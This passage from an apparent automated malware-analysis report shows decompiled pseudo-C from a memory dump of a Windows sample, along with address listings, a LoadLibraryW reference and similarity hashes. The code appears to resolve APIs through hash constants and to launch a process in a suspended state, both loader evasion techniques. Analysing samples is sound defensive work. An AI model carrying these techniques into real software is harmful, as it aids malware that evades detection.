								E00429710(_t407, 0x43b02d,  *0x43b02b & 0x0000ffff);
							}
						} else {
							_t353 =  *0x43b1ad; // 0x2491f30
							_t219 = E00429660(_t353);
							__eflags = _t219;
							if(_t219 != 0) {
								goto L54;
							}
						}
						_t162 =  *0x43b1b1; // 0x0
						__eflags = _t162;
						if(_t162 == 0) {
							L60:
							_t163 =  *0x43b1b1; // 0x0
							__eflags = _t163;
							if(_t163 == 0) {
								_push(0x10);
								_t164 = E00411030();
								_t419 = _t419 + 4;
								__eflags = _t164;
								if(_t164 != 0) {
									_push(0);
									_t165 = E00429350(_t164);
								} else {
									_t165 = 0;
								}
								 *0x43b1b1 = _t165;
							}
							_t404 =  *0x43b1b1; // 0x0
							__eflags = ( *0x43b02a & 0x000000ff) - 1;
							if(( *0x43b02a & 0x000000ff) == 1) {
								_t391 = 0x11041f01;
								E00406AD0(_t280, _t419 + 0x38, 0x11041f01, _t404, _t407, 1, 1);
								_push(_t419 + 0x38);
								E00429520(_t404);
								E00429510(_t419 + 0x38);
								_t172 = E00429650(_t404);
								__eflags = _t172;
								if(_t172 != 0) {
									_t391 = 0xd3ef7577;
									E00406AD0(_t280, _t419 + 8, 0xd3ef7577, _t404, _t407, 0, 0);
									E00429510(_t419);
								}
							} else {
								_t407 =  *0x43b1c4; // 0x400000
								__eflags =  *((char*)(E00413930(_t280, 0, _t404, _t407) + 0xb)) - 0x20;
								_t400 =  ==  ? 0x7e839a6 : 0x93fc68d6;
								_t391 = _t407;
								E00409090(_t419 + 0x88, _t407,  ==  ? 0x7e839a6 : 0x93fc68d6);
								_push(_t419 + 0x88);
								E00429520(_t404);
								E00429510(_t419 + 0x88);
							}
						} else {
							_t351 =  *0x43b1b1; // 0x0
							_t215 = E00429660(_t351);
							__eflags = _t215;
							if(_t215 != 0) {
								goto L60;
							}
						}
						_t173 =  *((intOrPtr*)(_t413 + 0x2c));
						__eflags = _t173 - 3;
						if(_t173 == 3) {
							__eflags = E0043B1CC - 3;
							if(E0043B1CC == 3) {
								_t174 =  *0x43b1d0; // 0x7beaf0
								_t122 = _t174 + 8; // 0x3a0043
								E00418CC0(_t419 + 0x10c,  *_t122);
							}
							_t281 = _t419 + 0x48;
							E00418810(_t419 + 0x48, 0);
							_t177 = E00419890(_t281, _t419 + 0x48, _t391, _t404, _t407, _t281, 0x439428,  *((intOrPtr*)(_t413 + 0x2c)));
							E00420220(_t419 + 0x110,  *_t177, 0);
							E00418CA0(_t281);
							E00408180(_t407);
						} else {
							__eflags = _t173 - 5;
							if(_t173 != 5) {
								__eflags = _t173 - 6;
								if(__eflags == 0) {
									_t328 = _t419 + 0xa4;
									 *_t328 = 0;
									 *((intOrPtr*)(_t328 + 4)) = 0;
									 *((intOrPtr*)(_t328 + 8)) = 0;
									 *((intOrPtr*)(_t328 + 0xc)) = 0;
									E00415B60(_t280, _t328, _t404, _t407, __eflags);
									E00406740(_t419 + 0xa4);
									E00411350(0x12);
									__eflags =  *(_t419 + 0xa8);
									if( *(_t419 + 0xa8) > 0) {
										_t283 = 0;
										__eflags = 0;
										do {
											_t192 = E00432B00(_t419 + 0xa8, _t283);
											__eflags =  *((char*)(_t192 + 0x3c));
											if( *((char*)(_t192 + 0x3c)) == 0) {
												E00402A40(_t419 + 0x50, _t192);
												E00418CA0(_t419 + 0x50);
											}
											_t283 = _t283 + 1;
											__eflags = _t283 -  *(_t419 + 0xa8);
										} while (_t283 <  *(_t419 + 0xa8));
									}
									E00432970(_t280, _t419 + 0xa4, _t404);
									_t332 =  *(_t419 + 0xb0);
									__eflags =  *(_t419 + 0xb0);
									if( *(_t419 + 0xb0) != 0) {
										E00402A20(_t332, 1);
									}
								}
							} else {
								__eflags = _t280;
								if(_t280 == 0) {
									__eflags = E0043B1CC - 1;
									if(__eflags <= 0) {
										L69:
										_t336 = _t419 + 0x18;
										 *_t336 = 0;
										 *((intOrPtr*)(_t336 + 4)) = 0;
										 *((intOrPtr*)(_t336 + 8)) = 0;
										 *((intOrPtr*)(_t336 + 0xc)) = 0;
										E00415B60(_t280, _t336, _t404, _t407, __eflags);
										__eflags = ( *0x43b029 & 0x000000ff) - 1;
										E00407DB0(_t419 + 0x18, 0 | ( *0x43b029 & 0x000000ff) - 0x00000001 > 0x00000000);
										__eflags =  *0x43b029 & 0x000000ff;
										if(( *0x43b029 & 0x000000ff) != 0) {
											E00411350(0x12);
											__eflags =  *(_t419 + 0x1c);
											if( *(_t419 + 0x1c) > 0) {
												_t284 = 0;
												__eflags = 0;
												do {
													_t202 = E00432B00(_t419 + 0x1c, _t284);
													__eflags =  *((char*)(_t202 + 0x3c));
													if( *((char*)(_t202 + 0x3c)) == 0) {
														E00402A40(_t419 + 0x10, _t202);
														E00418CA0(_t419 + 0x10);
													}
													_t284 = _t284 + 1;
													__eflags = _t284 -  *(_t419 + 0x1c);
												} while (_t284 <  *(_t419 + 0x1c));
											}
										}
										E00432970(_t280, _t419 + 0x18, _t404);
										_t339 =  *(_t419 + 0x24);
										__eflags =  *(_t419 + 0x24);
										if( *(_t419 + 0x24) != 0) {
											E00402A20(_t339, 1);
										}
									} else {
										_t205 =  *0x43b1d0; // 0x7beaf0
										_t81 = _t205 + 4; // 0x0
										__eflags = ( *( *_t81) & 0x0000ffff) - 0x2d;
										if(__eflags != 0) {
											goto L69;
										}
									}
								}
							}
						}
						E00428910(_t419 + 0x130, _t404, _t407);
						E00418CA0(_t419 + 0x110);
						E00418CA0(_t419 + 0x108);
						E00417A70(_t419 + 0x128);
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x43b027 & 0x000000ff;
						if(( *0x43b027 & 0x000000ff) == 0) {
							goto L52;
						} else {
							__eflags = _t280;
							if(_t280 != 0) {
								goto L52;
							} else {
								__eflags =  *((char*)(_t413 + 0xb)) - 0x20;
								_t402 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
								E004061B0(_t419 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t413 + 0xb)) - 0x20);
								E00418810(_t419 + 0x18, 0x200);
								_t356 = E004115C0(0xa1310f65, 0xc4d11e8a);
								__eflags = _t356;
								if(__eflags != 0) {
									_t242 =  *(_t419 + 0x18) >> 1;
									__eflags = _t242;
									_t402 =  *0x43b1c4; // 0x400000
									 *_t356(_t402,  *(_t419 + 0x18), _t242);
								}
								_push(0x80);
								_push(0);
								E0042A4E0(_t419 + 0x10, __eflags,  *((intOrPtr*)(_t419 + 0x20)), 1);
								E0042A520(_t419 + 8, _t402, _t419 + 0x1c, 0);
								__eflags =  *((char*)(_t419 + 0x10));
								if( *((char*)(_t419 + 0x10)) != 0) {
									E0042BE30(_t419 + 0xc, _t407);
								}
								__eflags = 0;
								E00418CA0(_t419);
								_t409 = _t419 + 0x1a0;
								_t416 = _t419 + 0x2c;
								while(1) {
									E00410B70(_t409, 0, 0x44);
									 *((intOrPtr*)(_t419 + 0x1ac)) = 0x44;
									E00410B70(_t416, 0, 0x10);
									_t419 = _t419 + 0x18;
									E00418810(_t419 + 0x4c, 0);
									_t234 = E004196D0(E004196D0(E00420220(_t419 + 0x50,  *((intOrPtr*)(_t419 + 0x40)), 0), 0x20), 0x22);
									_t235 =  *0x43b1d0; // 0x7beaf0
									E004196D0(E00420220(_t234,  *_t235, 0), 0x22);
									_t238 = E004115C0(0xa1310f65, 0x643f303c);
									__eflags = _t238;
									if(_t238 != 0) {
										break;
									}
									E00418CA0(_t419 + 0x48);
								}
								_push(_t416);
								_push(_t409);
								_push(0);
								_push(0);
								_push(4);
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)(_t419 + 0x68)));
								_push( *((intOrPtr*)(_t419 + 0x60)));
								asm("int3");
								return _t238;
							}
						}
					}
				} else {
					E00428910(_t419 + 0x130, _t403, _t407);
					E00418CA0(_t419 + 0x110);
					E00418CA0(_t419 + 0x108);
					E00417A70(_t419 + 0x128);
					__eflags = 0;
					return 0;
				}
			}

0x0040543b
0x0040543d
0x00405440
0x00405451
0x00405457
0x00405459
0x00405459
0x0040545e
0x0040546f
0x00405483
0x00405487
0x0040549c
0x0040549c
0x004054a5
0x004054bf
0x004054d9
0x004054ec
0x004054f1
0x004054f3
0x00405506
0x0040550b
0x0040551c
0x00405525
0x00405538
0x00405546
0x00405552
0x00405563
0x0040556a
0x00405576
0x00405589
0x00405590
0x00405599
0x00405599
0x00405599
0x0040559c
0x004054f5
0x004054f5
0x004054f5
0x004055a8
0x004055b4
0x004055b9
0x004055bb
0x004055c4
0x004055c4
0x00000000
0x00000000
0x00000000
0x004054c1
0x004054c8
0x004055bd
0x004055bd
0x004055bd
0x004055d2
0x004055e8
0x004055f4
0x00405601
0x00405603
0x00405608
0x00000000
0x0040560f
0x00000000
0x0040560f
0x0040560f
0x00405622
0x0040562e
0x0040562e
0x00405630
0x00405637
0x00405637
0x0040563a
0x00000000
0x00000000
0x0040563f
0x00000000
0x00405641
0x00405641
0x0040564b
0x00000000
0x0040564d
0x00000000
0x0040564d
0x0040564b
0x00000000
0x0040563f
0x0040564f
0x00000000
0x0040564f
0x0040560f
0x0040560f
0x00405652
0x00405652
0x00405656
0x0040569c
0x0040569e
0x004056ab
0x004056ad
0x004056b3
0x004056ba
0x004056c0
0x004056c5
0x004056c5
0x004056c8
0x004056cb
0x004056ce
0x004056de
0x004056e3
0x004056e8
0x004056f7
0x00405700
0x00405705
0x00405707
0x00405724
0x00405729
0x0040572f
0x0040572f
0x00405738
0x0040573d
0x0040573d
0x0040573f
0x0040574b
0x0040574d
0x00000000
0x00000000
0x00405754
0x00405759
0x0040575a
0x0040575d
0x00000000
0x00000000
0x00000000
0x0040575d
0x0040575f
0x00405766
0x00405770
0x00405783
0x0040578a
0x0040579b
0x0040579b
0x00405709
0x00405709
0x0040570e
0x00405714
0x00405714
0x0040571d
0x0040571d
0x004057a6
0x004057a6
0x004056ce
0x004056ba
0x004056ad
0x004057b2
0x004057b5
0x00405b3c
0x00405b3c
0x00405b41
0x00405b43
0x00405b54
0x00405b54
0x00405b59
0x00405b5b
0x00405e33
0x00405e35
0x00405e3a
0x00405e3d
0x00405e3f
0x00405e47
0x00405e49
0x00405e41
0x00405e41
0x00405e41
0x00405e4e
0x00405e4e
0x00405b61
0x00405b6e
0x00405b71
0x00405e0b
0x00405e10
0x00405e1a
0x00405e21
0x00405e22
0x00405e29
0x00405b77
0x00405b86
0x00405b86
0x00405b45
0x00405b45
0x00405b4b
0x00405b50
0x00405b52
0x00000000
0x00000000
0x00405b52
0x00405b92
0x00405b97
0x00405b99
0x00405baa
0x00405baa
0x00405baf
0x00405bb1
0x00405eb0
0x00405eb2
0x00405eb7
0x00405eba
0x00405ebc
0x00405ec4
0x00405ec6
0x00405ebe
0x00405ebe
0x00405ebe
0x00405ecb
0x00405ecb
0x00405bb7
0x00405bc4
0x00405bc7
0x00405e62
0x00405e68
0x00405e73
0x00405e74
0x00405e7d
0x00405e84
0x00405e89
0x00405e8b
0x00405e93
0x00405e9e
0x00405ea6
0x00405ea6
0x00405bcd
0x00405bcf
0x00405be8
0x00405bf1
0x00405bf5
0x00405bf7
0x00405c05
0x00405c06
0x00405c12
0x00405c12
0x00405b9b
0x00405b9b
0x00405ba1
0x00405ba6
0x00405ba8
0x00000000
0x00000000
0x00405ba8
0x00405c1e
0x00405c21
0x00405c24
0x00405d87
0x00405d8e
0x00405ed5
0x00405eda
0x00405ee4
0x00405ee4
0x00405d94
0x00405d9c
0x00405daa
0x00405dbd
0x00405dc4
0x00405dc9
0x00405c2a
0x00405c2a
0x00405c2d
0x00405cf0
0x00405cf3
0x00405cfb
0x00405d02
0x00405d04
0x00405d07
0x00405d0a
0x00405d0d
0x00405d1b
0x00405d25
0x00405d2a
0x00405d32
0x00405d34
0x00405d34
0x00405d36
0x00405d3e
0x00405d43
0x00405d47
0x00405d4f
0x00405d58
0x00405d58
0x00405d5d
0x00405d5e
0x00405d5e
0x00405d36
0x00405d6e
0x00405d73
0x00405d7a
0x00405d7c
0x00405d80
0x00405d80
0x00405d7c
0x00405c33
0x00405c33
0x00405c35
0x00405c3b
0x00405c42
0x00405c58
0x00405c5a
0x00405c5e
0x00405c60
0x00405c63
0x00405c66
0x00405c69
0x00405c77
0x00405c81
0x00405c8d
0x00405c8f
0x00405c96
0x00405c9b
0x00405ca0
0x00405ca2
0x00405ca2
0x00405ca4
0x00405ca9
0x00405cae
0x00405cb2
0x00405cba
0x00405cc3
0x00405cc3
0x00405cc8
0x00405cc9
0x00405cc9
0x00405ca4
0x00405ca0
0x00405cd3
0x00405cd8
0x00405cdc
0x00405cde
0x00405ce6
0x00405ce6
0x00405c44
0x00405c44
0x00405c49
0x00405c4f
0x00405c52
0x00000000
0x00000000
0x00405c52
0x00405c42
0x00405c35
0x00405c2d
0x00405dd5
0x00405de1
0x00405ded
0x00405df9
0x00405dfe
0x00405e0a
0x004057bb
0x004057c2
0x004057c4
0x00000000
0x004057ca
0x004057ca
0x004057cc
0x00000000
0x004057d2
0x004057dc
0x004057e4
0x004057e7
0x004057f5
0x00405809
0x0040580b
0x0040580d
0x00405813
0x00405813
0x0040581a
0x00405821
0x00405821
0x00405823
0x00405828
0x00405834
0x00405844
0x00405849
0x0040584e
0x00405854
0x00405854
0x00405859
0x0040585e
0x00405863
0x0040586a
0x0040586e
0x00405873
0x00405878
0x00405888
0x0040588d
0x00405896
0x004058b7
0x004058be
0x004058d0
0x004058df
0x004058e4
0x004058e6
0x00000000
0x00000000
0x00405996
0x00405996
0x004058ec
0x004058ed
0x004058ee
0x004058ef
0x004058f0
0x004058f2
0x004058f3
0x004058f4
0x004058f5
0x004058f9
0x004058fd
0x004058fe
0x004058fe
0x004057cc
0x004057c4
0x00405658
0x0040565f
0x0040566b
0x00405677
0x00405683
0x00405688
0x00405694
0x00405694

APIs

LoadLibraryW.KERNEL32(00000000,00000001,A1310F65,F3AF54A7,A1310F65,F3AF54A7), ref: 0040562E

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 41164b3071e0432c662967f4abaf2cf62c0ee253bc3e5b11db882df5b86ec1ef
Instruction ID: 8ae94760d0a613bbdae3c514c7e400636ba604ac79f1e7301a338078a02c6035
Opcode Fuzzy Hash: 41164b3071e0432c662967f4abaf2cf62c0ee253bc3e5b11db882df5b86ec1ef
Instruction Fuzzy Hash: A921E5311086845BC735BB21C8527EF73E1EF84304F40483FE18A661D2EF395945CA9A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00427660, Relevance: 4.5, Strings: 3, Instructions: 793
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00427660(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t203;
				signed int _t206;
				signed int* _t207;
				signed int* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t259;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int* _t269;
				signed int _t271;
				signed int _t272;
				signed int _t275;
				signed int _t280;
				signed int* _t281;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int* _t316;
				signed int _t324;
				signed int _t326;
				unsigned int _t331;
				signed int _t333;
				signed int* _t335;
				signed int _t337;
				signed int* _t339;
				char _t340;
				char _t341;
				signed int _t343;
				intOrPtr* _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t349;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				unsigned int _t372;
				signed int _t374;
				signed int* _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t386;
				void* _t387;
				signed int _t388;
				intOrPtr* _t390;
				unsigned int _t396;
				signed int _t398;
				void* _t399;
				signed int _t400;
				signed int _t401;
				intOrPtr _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t422;
				signed int _t428;
				signed int _t429;
				unsigned int _t434;
				signed int _t437;
				void* _t439;
				void* _t441;

				_t439 = (_t437 & 0xfffffff0) - 0x34;
				_t390 = __ecx;
				_t303 =  *__ecx;
				if(_t303 != 0) {
					_t343 =  *( *( *(__ecx + 4)));
					__eflags = _t343;
					if(_t343 == 0) {
						L35:
						_push(0x40);
						_t284 = E00411030();
						_t439 = _t439 + 4;
						__eflags =  *_t390 - 1;
						 *_t284 = 0;
						if( *_t390 <= 1) {
							goto L203;
						} else {
							_t415 = 0x40;
							goto L37;
						}
					} else {
						__eflags =  *_t343;
						if( *_t343 == 0) {
							goto L35;
						} else {
							_t262 = _t343 & 0x0000000f;
							__eflags = _t262;
							if(_t262 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t294 =  ~( ~_t262 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								__eflags = _t294;
								_v64 = _t294;
								_t429 = _t294;
								while(1) {
									asm("movdqu xmm1, [edx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t294;
									if(_t294 != 0) {
										break;
									}
									_t262 = _t262 + 0x10;
									__eflags = _t262 - _t429;
									if(_t262 < _t429) {
										continue;
									} else {
										_v64 = _t429;
										__eflags = _v64 - 0x7fffffff;
										if(_v64 >= 0x7fffffff) {
											L23:
											_v64 = 0x7fffffff;
										} else {
											_t275 = _t429;
											while(1) {
												__eflags =  *((char*)(_t275 + _t343));
												if( *((char*)(_t275 + _t343)) == 0) {
													break;
												}
												_t275 = _t275 + 1;
												__eflags = _t275 - 0x7fffffff;
												if(_t275 < 0x7fffffff) {
													continue;
												} else {
													goto L23;
												}
												goto L24;
											}
											_v64 = _t275;
										}
									}
									goto L24;
								}
								asm("bsf ebx, ebx");
								_v64 = _t294 + _t262;
							} else {
								_v64 = 0;
								_t299 = _v64;
								_t262 =  ~_t262 + 0x10;
								__eflags = _t262;
								while(1) {
									__eflags =  *((char*)(_t299 + _t343));
									if( *((char*)(_t299 + _t343)) == 0) {
										break;
									}
									_t299 = _t299 + 1;
									__eflags = _t299 - _t262;
									if(_t299 < _t262) {
										continue;
									} else {
										goto L16;
									}
									goto L24;
								}
								_v64 = _t299;
							}
							L24:
							_t264 = _v64 + 1;
							__eflags = _t264 - 0x40;
							_t265 =  <=  ? 0x40 : _t264;
							__eflags = _t265;
							if(_t265 > 0) {
								_t434 = (_t265 >> 5 >> 0x1a) + _t265 >> 6;
								_t266 = _t265 & 0x8000003f;
								__eflags = _t266;
								if(_t266 < 0) {
									_t266 = (_t266 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t266;
								}
								__eflags = _t266;
								_t415 = _t434 + (0 | _t266 > 0x00000000) << 6;
								_push(_t415);
								_v68 = _t343;
								_t269 = E00411030();
								_t385 = _v68;
								_t339 = _t269;
								_t439 = _t439 + 4;
								_v60 = 0;
								_v44 = _t339;
								_v36 = _t390;
								 *_t339 = 0;
								_v68 =  *_t390;
								_t298 = _v60;
								_t404 = _v64;
								while(1) {
									_t271 =  *_t385;
									_t298 = _t298 + 1;
									 *_t339 = _t271;
									__eflags = _t404;
									if(_t404 == 0) {
										goto L33;
									}
									__eflags = _t298 - _t404;
									if(_t298 == _t404) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
										_t339[0] = 0;
									} else {
										goto L33;
									}
									L206:
									__eflags = _t272 - 1;
									if(_t272 > 1) {
										goto L37;
									} else {
										goto L157;
									}
									goto L200;
									L33:
									__eflags = _t271;
									if(_t271 == 0) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
									} else {
										_t339 =  &(_t339[0]);
										_t385 = _t385 + 1;
										__eflags = _t385;
										continue;
									}
									goto L206;
								}
							} else {
								_t284 = 0;
								__eflags = _t303 - 1;
								if(_t303 <= 1) {
									L203:
									_t344 = _a4;
									_t203 = 0;
									 *_t344 = 0;
									 *((intOrPtr*)(_t344 + 4)) = 0;
									__eflags = _t284;
									if(_t284 == 0) {
										goto L191;
									} else {
										goto L158;
									}
								} else {
									_t415 = 0;
									L37:
									_t36 =  &_a8; // 0x433877
									_t308 =  *_t36 & 0x0000000f;
									asm("pxor xmm0, xmm0");
									_t359 =  ~_t308 + 0x10;
									__eflags = _t359;
									_v52 = _t359;
									_v56 = _t308;
									_v48 = _t415;
									_v36 = _t390;
									_t400 = 1;
									goto L38;
									do {
										do {
											do {
												L38:
												__eflags = _a8;
												if(_a8 != 0) {
													_t363 = _a8;
													__eflags =  *_t363;
													if( *_t363 != 0) {
														__eflags = _t284 - _a8;
														if(_t284 != _a8) {
															_t229 = _v56;
															__eflags = _t229;
															if(_t229 == 0) {
																L46:
																asm("pxor xmm1, xmm1");
																_t422 =  ~( ~_t229 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t422;
																while(1) {
																	asm("movdqu xmm0, [ecx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb edx, xmm0");
																	__eflags = _t363;
																	if(_t363 != 0) {
																		break;
																	}
																	_t229 = _t229 + 0x10;
																	__eflags = _t229 - _t422;
																	if(_t229 < _t422) {
																		continue;
																	} else {
																		__eflags = _t422 - 0x7fffffff;
																		if(_t422 >= 0x7fffffff) {
																			L53:
																			_t422 = 0x7fffffff;
																		} else {
																			_t363 = _a8;
																			while(1) {
																				__eflags =  *((char*)(_t422 + _t363));
																				if( *((char*)(_t422 + _t363)) == 0) {
																					goto L54;
																				}
																				_t422 = _t422 + 1;
																				__eflags = _t422 - 0x7fffffff;
																				if(_t422 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L53;
																				}
																				goto L54;
																			}
																		}
																	}
																	goto L54;
																}
																asm("bsf esi, edx");
																_t422 = _t422 + _t229;
															} else {
																_t229 = _v52;
																_t422 = 0;
																__eflags = 0;
																_t324 = _a8;
																_t363 = _t229;
																while(1) {
																	__eflags =  *((char*)(_t422 + _t324));
																	if( *((char*)(_t422 + _t324)) == 0) {
																		break;
																	}
																	_t422 = _t422 + 1;
																	__eflags = _t422 - _t363;
																	if(_t422 < _t363) {
																		continue;
																	} else {
																		_v52 = _t363;
																		goto L46;
																	}
																	goto L54;
																}
																_v52 = _t363;
															}
															L54:
															__eflags = _t284;
															if(_t284 == 0) {
																_t311 = 0;
															} else {
																_t239 = _t284 & 0x0000000f;
																__eflags = _t239;
																if(_t239 == 0) {
																	L59:
																	asm("pxor xmm1, xmm1");
																	_t311 =  ~( ~_t239 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																	__eflags = _t311;
																	while(1) {
																		asm("movdqu xmm0, [ebx+eax]");
																		asm("pcmpeqb xmm0, xmm1");
																		asm("pmovmskb edx, xmm0");
																		__eflags = _t363;
																		if(_t363 != 0) {
																			break;
																		}
																		_t239 = _t239 + 0x10;
																		__eflags = _t239 - _t311;
																		if(_t239 < _t311) {
																			continue;
																		} else {
																			__eflags = _t311 - 0x7fffffff;
																			if(_t311 >= 0x7fffffff) {
																				L65:
																				_t311 = 0x7fffffff;
																			} else {
																				while(1) {
																					__eflags =  *((char*)(_t311 + _t284));
																					if( *((char*)(_t311 + _t284)) == 0) {
																						goto L66;
																					}
																					_t311 = _t311 + 1;
																					__eflags = _t311 - 0x7fffffff;
																					if(_t311 < 0x7fffffff) {
																						continue;
																					} else {
																						goto L65;
																					}
																					goto L66;
																				}
																			}
																		}
																		goto L66;
																	}
																	asm("bsf ecx, edx");
																	_t311 = _t311 + _t239;
																} else {
																	_t311 = 0;
																	_t239 =  ~_t239 + 0x10;
																	__eflags = _t239;
																	while(1) {
																		__eflags =  *((char*)(_t311 + _t284));
																		if( *((char*)(_t311 + _t284)) == 0) {
																			goto L66;
																		}
																		_t311 = _t311 + 1;
																		__eflags = _t311 - _t239;
																		if(_t311 < _t239) {
																			continue;
																		} else {
																			goto L59;
																		}
																		goto L66;
																	}
																}
															}
															L66:
															_t55 = _t311 + 1; // 0x80000000
															_t312 = _t422 + _t55;
															__eflags = _t312;
															if(_t312 != 0) {
																__eflags = _t312 - 0x40;
																_t313 =  <=  ? 0x40 : _t312;
																__eflags = _t313 - _v48;
																if(_t313 > _v48) {
																	goto L71;
																}
																goto L83;
															} else {
																__eflags = _t284;
																if(_t284 == 0) {
																	__eflags = _v48 - 0x40;
																	if(_v48 >= 0x40) {
																		goto L97;
																	} else {
																		goto L213;
																	}
																	goto L225;
																} else {
																	 *_t284 = 0;
																	_t365 = 0;
																	__eflags = _v48 - 0x40;
																	if(_v48 < 0x40) {
																		L213:
																		_t313 = 0x40;
																		L71:
																		_t372 = (_t313 >> 5 >> 0x1a) + _t313 >> 6;
																		_v48 = _t372;
																		_t315 = _t313 & 0x8000003f;
																		__eflags = _t315;
																		if(_t315 < 0) {
																			_t315 = (_t315 - 0x00000001 | 0xffffffc0) + 1;
																			__eflags = _t315;
																		}
																		__eflags = _t315;
																		_t374 = _t372 + (0 | _t315 > 0x00000000) << 6;
																		_v48 = _t374;
																		_push(_t374);
																		_t234 = E00411030();
																		_v68 = _t234;
																		_t439 = _t439 + 4;
																		__eflags = _t284;
																		if(_t284 == 0) {
																			 *_t234 = 0;
																		} else {
																			__eflags = _v68;
																			if(_v68 != 0) {
																				_t376 = _t234;
																				_t236 =  *_t284;
																				 *_t376 = _t236;
																				__eflags = _t236;
																				if(_t236 != 0) {
																					_v32 = _t400;
																					_t237 = 0;
																					__eflags = 0;
																					_t316 = _t376;
																					while(1) {
																						_t237 = _t237 + 1;
																						_t377 =  *((char*)(_t284 + _t237 * 2 - 1));
																						 *(_t316 + _t237 * 2 - 1) = _t377;
																						__eflags = _t377;
																						if(_t377 == 0) {
																							break;
																						}
																						_t378 =  *((char*)(_t284 + _t237 * 2));
																						 *(_t316 + _t237 * 2) = _t378;
																						__eflags = _t378;
																						if(_t378 != 0) {
																							continue;
																						}
																						break;
																					}
																					_t400 = _v32;
																				}
																			}
																			_push(1);
																			_push(_t284);
																			E004110B0();
																			_t439 = _t439 + 8;
																		}
																		_t284 = _v68;
																		L83:
																		_t314 = _t284;
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t365 =  *_t284;
																			goto L85;
																		}
																	} else {
																		_t314 = _t284;
																		L85:
																		__eflags = _t365;
																		if(_t365 != 0) {
																			_t367 = 0;
																			__eflags = 0;
																			while(1) {
																				_t367 = _t367 + 1;
																				_t231 = _t284 + _t367 * 2;
																				__eflags =  *(_t231 - 1);
																				_t78 = _t231 - 1; // -1
																				_t314 = _t78;
																				if( *(_t231 - 1) == 0) {
																					goto L89;
																				}
																				_t314 = _t231;
																				__eflags =  *_t231;
																				if( *_t231 != 0) {
																					continue;
																				}
																				goto L89;
																			}
																		}
																		L89:
																		_t366 = _t314;
																		__eflags = _t422;
																		if(__eflags != 0) {
																			if(__eflags > 0) {
																				goto L92;
																			}
																		} else {
																			_t422 = 0x7fffffff;
																			L92:
																			_v32 = _t400;
																			_t230 = 0;
																			__eflags = 0;
																			_v44 = _t284;
																			_t401 = _a8;
																			while(1) {
																				_t287 =  *((char*)(_t230 + _t401));
																				 *(_t230 + _t366) = _t287;
																				__eflags = _t287;
																				if(_t287 == 0) {
																					break;
																				}
																				_t85 = _t366 + 1; // 0x1
																				_t314 = _t230 + _t85;
																				_t230 = _t230 + 1;
																				__eflags = _t230 - _t422;
																				if(_t230 < _t422) {
																					continue;
																				}
																				break;
																			}
																			_t400 = _v32;
																			_t284 = _v44;
																		}
																		 *_t314 = 0;
																	}
																}
															}
														}
													}
												}
												L97:
												_t309 =  *(_v36 + 4);
												_t361 =  *( *(_t309 + _t400 * 4));
												__eflags = _t361;
												if(_t361 == 0) {
													goto L99;
												} else {
													__eflags =  *_t361;
													if( *_t361 != 0) {
														__eflags = _t361 - _t284;
														if(_t361 == _t284) {
															goto L99;
														} else {
															_t225 = _t361 & 0x0000000f;
															__eflags = _t225;
															if(_t225 == 0) {
																L106:
																asm("pxor xmm1, xmm1");
																_t428 =  ~( ~_t225 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t428;
																while(1) {
																	asm("movdqu xmm0, [edx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb ecx, xmm0");
																	__eflags = _t309;
																	if(_t309 != 0) {
																		break;
																	}
																	_t225 = _t225 + 0x10;
																	__eflags = _t225 - _t428;
																	if(_t225 < _t428) {
																		continue;
																	} else {
																		__eflags = _t428 - 0x7fffffff;
																		if(_t428 >= 0x7fffffff) {
																			L112:
																			_t428 = 0x7fffffff;
																		} else {
																			while(1) {
																				__eflags =  *((char*)(_t428 + _t361));
																				if( *((char*)(_t428 + _t361)) == 0) {
																					goto L113;
																				}
																				_t428 = _t428 + 1;
